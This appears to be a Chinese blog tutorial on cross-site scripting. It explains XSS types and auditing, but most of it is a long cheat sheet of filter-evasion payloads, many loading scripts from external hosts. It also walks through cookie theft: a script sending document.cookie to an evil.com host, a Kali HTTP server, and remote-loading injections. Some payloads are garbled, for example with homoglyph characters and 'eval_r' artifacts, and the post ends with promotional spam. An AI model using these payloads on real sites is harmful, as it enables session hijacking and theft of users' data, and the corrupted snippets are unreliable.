网络安全之从原理看懂 XSS

  

01、XSS 的原理和分类

跨站脚本攻击 XSS(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets，CSS)的缩写混淆

故将跨站脚本攻击缩写为 XSS，恶意攻击者往 Web 页面里插入恶意 Script 代码，当用户浏览该页面时，嵌入 Web 里面的 Script 代码会被执行，从而达到恶意攻击用户的目的，XSS 攻击针对的是用户层面的攻击；

XSS 分为：存储型，反射型，DOM 型 XSS

存储型 XSS：存储型 XSS，持久化，代码是存储在服务器中，如在个人信息或发表文章等地方，插入代码，如果没有过滤或者过滤不严，那么这些代码将储存到数据库中，用户访问该页面的时候出发代码执行，这种 XSS 比较危险，容易造成蠕虫，盗取 Cookie；

反射型 XSS：非持久化，需要欺骗用户自己去点击链接才能触发 XSS 代码(服务器中没有这样的页面和内容)，一般容易出现在搜索页面，反射性 XSS 大多数是用来盗取用户的 Cookie 信息；

DOM 型 XSS:不经过后端，DOM-XSS 漏洞是基于文档对象模型(Document Object Model ,DOM)的一种漏洞，DOM-XSS 是用过 url 传入参数取控制触发的，其实也属于反射型 XSS，DOM 的详解：DOM 文档对象模型；

可能触发 DOM 型 XSS 的属性

document.refererwindow.namelocationinnerHTMLdocumen.write

02、XSS 攻击的危害

1、盗取各类用户账号，如机器登陆账号，用户网银账号，各类管理员账号；2、控制企业数据，包括读取，篡改，添加，删除企业敏感数据的能力；3、盗取企业重要的具有商业价值的资料；4、非法转账；5、强制发送电子邮件；6、网站挂马；7、控制受害者机器向其他网站发起攻击；

03、XSS 的测试语句

在网站是否存在 XSS 漏洞时，应该输入一些标签，如<，>输入后查看网页源代码是否过滤标签，如果没有过滤，很大可能存在 XSS 漏洞。

常用测试语句：<h5>1</h5>

<span>1</span>

可以看到，网站并没有对标签进行过滤；<script>console.log(1);</script>

可以看到，并没有弹出，但是控制台上输出了 1，我们可以确定，确实存在 XSS；

闭合问题：很多时候，在测试 XSS 的时候，想要要考虑到闭合问题，我们首先查看网页的源代码，需要首先判断出来，网站用的时单引号闭合还是双引号闭合；

"><span>x</span><"

'><span>x</span><'

单行注释：

"><span>x</span>//#双斜杠表示注释掉后面的语句

0x04、XSS 攻击语句

输入检测确定标签没有过滤，为了显示漏洞存在，需要插入 XSS 攻击代码；

<script>alert(1)</script><svg onload=alert(1)><a href=javascript:alert(1)><a href='javascript:alert(1)'>aa</a>

复制代码

(1)普通的 XSS JavaScript 注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG 标签 XSS 使用 JavaScript 命令<IMG SRC=http://3w.org/XSS/xss.js/>(3)IMG 标签无分号无引号<IMG SRC=javascript:alert('XSS')>(4)IMG 标签大小写不敏感<IMG SRC=JaVaScRiPt:alert('XSS')>(5)HTML 编码(必须有分号)<IMG SRC=javascript:alert("XSS")>(6)修正缺陷 IMG 标签<IMG """><SCRIPT>alert("XSS")</SCRIPT>">(7)formCharCode 标签(计算器)<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>(8)UTF-8 的 Unicode 编码(计算器)<IMG SRC=jav..省略..S')>(9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)<IMG SRC=jav..省略..S')>(10)十六进制编码也是没有分号(计算器)<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>(11)嵌入式标签,将 Javascript 分开<IMG SRC="jav ascript:alert('XSS');">(12)嵌入式编码标签,将 Javascript 分开<IMG SRC="jav ascript:alert('XSS');">(13)嵌入式换行符<IMG SRC="jav ascript:alert('XSS');">(14)嵌入式回车<IMG SRC="jav ascript:alert('XSS');">(15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子<IMG SRC="javascript:alert('XSS')">(16)解决限制字符(要求同页面)

<script>z='document.'</script><script>z=z+'write("'</script><script>z=z+'<script'</script><script>z=z+'src=ht'</script><script>z=z+'tp://ww'</script><script>z=z+'w.shell'</script><script>z=z+'.net/1.'</script><script>z=z+'js></sc'</script><script>z=z+'ript>")'</script><script>eval_r(z)</script>

复制代码

(17)空字符 12-7-1 T00LS - Powered by Discuz! Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 2/6perl-e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out(18)空字符 2,空字符在国内基本没效果.因为没有地方可以利用perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out(19)Spaces 和 meta 前的 IMG 标签<IMG SRC=" javascript:alert('XSS');">(20)Non-alpha-non-digit XSS<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

复制代码

(22)Non-alpha-non-digit XSS to 3<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>(23)双开括号<<SCRIPT>alert("XSS");//<</SCRIPT>(24)无结束脚本标记(仅火狐等浏览器)<SCRIPT SRChttp://3w.org/XSS/xss.js?<B>(25)无结束脚本标记 2<SCRIPT SRC=//3w.org/XSS/xss.js>(26)半开的 HTML/JavaScript XSS<IMG SRC="javascript:alert('XSS')"(27)双开角括号<iframe src=http://3w.org/XSS.html <(28)无单引号 双引号 分号<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>(29)换码过滤的 JavaScript\";alert('XSS');//(30)结束 Title 标签</TITLE><SCRIPT>alert("XSS");</SCRIPT>(31)Input Image<INPUT SRC="javascript:alert('XSS');">(32)BODY Image<BODY BACKGROUND="javascript:alert('XSS')">(33)BODY 标签<BODY('XSS')>(34)IMG Dynsrc<IMG DYNSRC="javascript:alert('XSS')">(35)IMG Lowsrc<IMG LOWSRC="javascript:alert('XSS')">(36)BGSOUND<BGSOUND SRC="javascript:alert('XSS');">(37)STYLE sheet<LINK REL="stylesheet" HREF="javascript:alert('XSS');">(38)远程样式表<LINK REL="stylesheet" HREF="http://3w.org/xss.css">(39)List-style-image(列表式)<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE<UL><LI>XSS(40)IMG VBscript<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS(41)META 链接 url<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://URL=javascript:alert('XSS');">(42)Iframe<IFRAME SRC="javascript:alert('XSS');"></IFRAME>(43)Frame

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>12-7-1 T00LS - Powered by Discuz!Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6

复制代码

(44)Table<TABLE BACKGROUND="javascript:alert('XSS')">(45)TD<TABLE><TD BACKGROUND="javascript:alert('XSS')">(46)DIV background-image<DIV STYLE="background-image: url(javascript:alert('XSS'))">(47)DIV background-image 后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279) **<DIV STYLE="background-image: url(javascript:alert('XSS'))">**(48)DIV expression<DIV STYLE="width: expression_r(alert('XSS'));">(49)STYLE 属性分拆表达<IMG STYLE="xss:expression_r(alert('XSS'))">(50)匿名 STYLE(组成:开角号和一个字母开头)<XSS STYLE="xss:expression_r(alert('XSS'))">(51)STYLE background-image<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><ACLASS=XSS></A>(52)IMG STYLE 方式exppression(alert("XSS"))'>(53)STYLE background

<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>(54)BASE<BASE HREF="javascript:alert('XSS');//">

复制代码

(55)EMBED 标签,你可以嵌入 FLASH,其中包涵 XSS<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>(56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);(57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上<HTML xmlns:xss><?import namespace="xss"implementation="http://3w.org/XSS/xss.htc"><xss:xss>XSS</xss:xss></HTML>(58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用<SCRIPT SRC=""></SCRIPT>(59)IMG 嵌入式命令,可执行任意命令<IMG SRC="http://www.a.com/a.php?a=b">(60)IMG 嵌入式命令(a.jpg 在同服务器)Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser(61)绕符号过滤·<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>(62)<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>(63)<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>(64)<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>(65)<SCRIPT a=> SRC="http://3w.org/xss.js"></SCRIPT>(66)

12-7-1 T00LS - Powered by Discuz! Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 4/6<SCRIPT a=">'>"SRC="http://3w.org/xss.js"></SCRIPT>

复制代码

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

复制代码

(68)URL 绕行<A HREF="http://127.0.0.1/">XSS</A>(69)URL 编码<A HREF="http://3w.org">XSS</A>(70)IP 十进制<A HREF="http://3232235521″>XSS</A>(71)IP 十六进制<A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>(72)IP 八进制<A HREF="http://0300.0250.0000.0001″>XSS</A>(73)混合编码<A HREF="http://6 6.000146.0×7.147/"">XSS</A>(74)节省[http:]<A HREF="//www.google.com/">XSS</A>(75)节省[www]<A HREF="http://google.com/">XSS</A>(76)绝对点绝对 DNS<A HREF="http://www.google.com./">XSS</A>(77)javascript 链接<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

各个标签的的攻击语句；

<script>alert("hack")</script>   #弹出hack<script>alert(/hack/)</script>   #弹出hack<script>alert(1)</script>        #弹出1，对于数字可以不用引号<script>alert(document.cookie)</script>      #弹出cookie<script src=http://xxx.com/xss.js></script>  #引用外部的xss

复制代码

svg 标签：

<svg onload="alert(1)"><svg onload="alert(1)"//

复制代码

标签：

<img  src=1  οnerrοr=alert("hack")><img  src=1  οnerrοr=alert(document.cookie)>  #弹出cookie

复制代码

标签：

<body οnlοad=alert(1)><body οnpageshοw=alert(1)>

复制代码

video 标签：

<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />

复制代码

style 标签：

<style οnlοad=alert(1)></style>

复制代码

05、XSS 漏洞的挖掘

5.1、黑盒测试

尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些：

• URL 的每一个参数

• URL 本身

• 表单

• 搜索框

5.2、常见业务场景

• 重灾区：评论区，留言区，个人信息，订单信息等

• 针对型：站内信，网页及时通讯，私信，意见反馈

• 存在风险：搜索框，当前目录，图片属性等；

5.3、白盒审计

关于 XSS 的代码审计主要就是从接收参数的地方和一些关键此入手；

PHP 中常见的接收参数的方法有G​ET，_POST，$_REQUEST 等等，可以搜索所有接收参数的方法，然后对接收到的数据进行跟踪，看看有没有输出到页面中，然后看看输出到页面中的数据是否进行了过滤和 html 编码等处理

也可以搜索类似 echo 这样的输出语句，跟踪输出的变量是从哪里来的，我们是否能控制，如果从数据库中取得，是否能控制存到数据库得数据，存到数据库之前有没有得到过滤等等；

大多数程序会对接收参数封装在公共文件得函数中统一调用，我们就需要审计这些公共函数看有没有过滤，能否绕过等等；

同理审计 DOM 型注入可以搜索一些 js 操作 DOM 元素得关键字进行审计；

06、XSS 的攻击过程

6.1、反射型 XSS 漏洞：

1、Alice 经常浏览某个网站，此网站为 Bob 所拥有，Bob 的站点需要 Alice 使用用户名、密码进行登陆，并存储了 Ailce 敏感信息(比如银行账户)；

2、Tom 发现 Bob 的站点存在反射的 XSS 漏洞；

3、Tom 利用 Bob 网站的反射型 XSS 漏洞编写了一个 exp，做成链接的形式，并利用各种手段诱导 Alice 点击

4、Alice 在登陆 Bob 的站点后，浏览了 Tom 提供的恶意链接；

5、嵌入到恶意链接中的恶意脚本在 Alice 的浏览器中执行，此脚本盗取敏感信息(cookie,账号等信息)，然后在 Alice 完全不知情的情况下将这些信息发送给了 Tom；

6、Tom 利用获取到的 Cookie 就可以以 Alice 的身份信息登陆 Bob 的站点，如果脚本的功能更强大的化，Tom 还可以对 Alice 的浏览器做控制并进一步利用漏洞控制；

6.2、存储型 XSS 漏洞：

1、Bob 拥有一个 Web 站点，该站点允许用户发布信息，浏览已发布的信息；

2、Tom 检测到 Bob 的站点存在存储型的 XSS 漏洞；

3、Tom 在 Bob 的网站发布了一个带有恶意脚本的热点信息，该热点信息存储在了 Bob 的服务器的数据库中，然后吸引其他用户来阅读该热点信息；

4、Bob 或者时任何的其他人，如 Alice 浏览了该信息之后，Tom 的恶意脚本就会执行；

5、Tom 的恶意脚本执行后，Tom 就可以对浏览器该页面的用户发起一次 XSS 攻击；

07、XSS 攻击测试

7.1、远程加载攻击 payload

XSS 漏洞能够通过构造恶意的 XSS 语句实现很多功能，其中做常用的时，构建 XSS 恶意代码获取对方浏览器的 COOKIE；

1）我们首先把恶意代码保存在本地 kali 里面，实战情况下，我们将代码保存在我们的服务器上；

var img=document.createElement("img");img.src="http://www.evil.com/log?"+escape(document.cookie);document.body.appendChild(img);

2）我们在 kali，用 python 开启 http 服务；

python -m http.server 80

3）我们在有 XSS 漏洞的地方，远程加载我们的恶意代码：<script src="http://192.168.61.128/xss.js"></script>

看到浏览器加载了，我们的 xss 恶意代码；

4）成功获取到了 cookie 信息

5）图片创建链接

<img src=''onerror=document.body.appendChild(document.createElement('script')).src='//192.168.0.110/xss.js'>

6）字符拼接

这种一般是输入的字符有限制的时候使用

<script>z='document.'</script><script>z=z+'write("'</script><script>z=z+'<script'</script><script>z=z+' src=ht'</script><script>z=z+'tp://www.'</script><script>z=z+'xsstools'</script><script>z=z+'.com/a'</script><script>z=z+'mER></sc'</script><script>z=z+'ript>")'</script><script>eval(z)</script>有的情况要用/**/注释不需要的代码。

7）jQuery 加载

<script>$.getScript("//www.xsstools.com/amER");</script>

7.2、反射型 XSS：

//前端 1.html：<html><head lang="en">    <meta charset="UTF-8">    <title>反射型XSS</title></head><body>    <form action="action.php" method="post">        <input type="text" name="name" />        <input type="submit" value="提交">    </form></body></html>
//后端 action.php：<?php    $name=$_POST["name"];   echo $name;?>
           如果你对网络安全入门感兴趣，那么你点击这里👉CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

如果你对网络安全感兴趣，学习资源免费分享，保证100%免费！！！（嘿客入门教程）

1.成长路线图&学习规划

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

2.视频教程

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！

4.护网行动资料

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

5.黑客必读书单

6.面试题合集

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

更多内容为防止和谐，可以扫描获取~

需要全套共282G的《网络安全&黑客技术零基础到进阶全套学习大礼包》，可以扫描下方二维码免费领取！

 如果你有需要可以点击👉CSDN大礼包：《嘿客&网络安全入门&进阶学习资源包》免费分享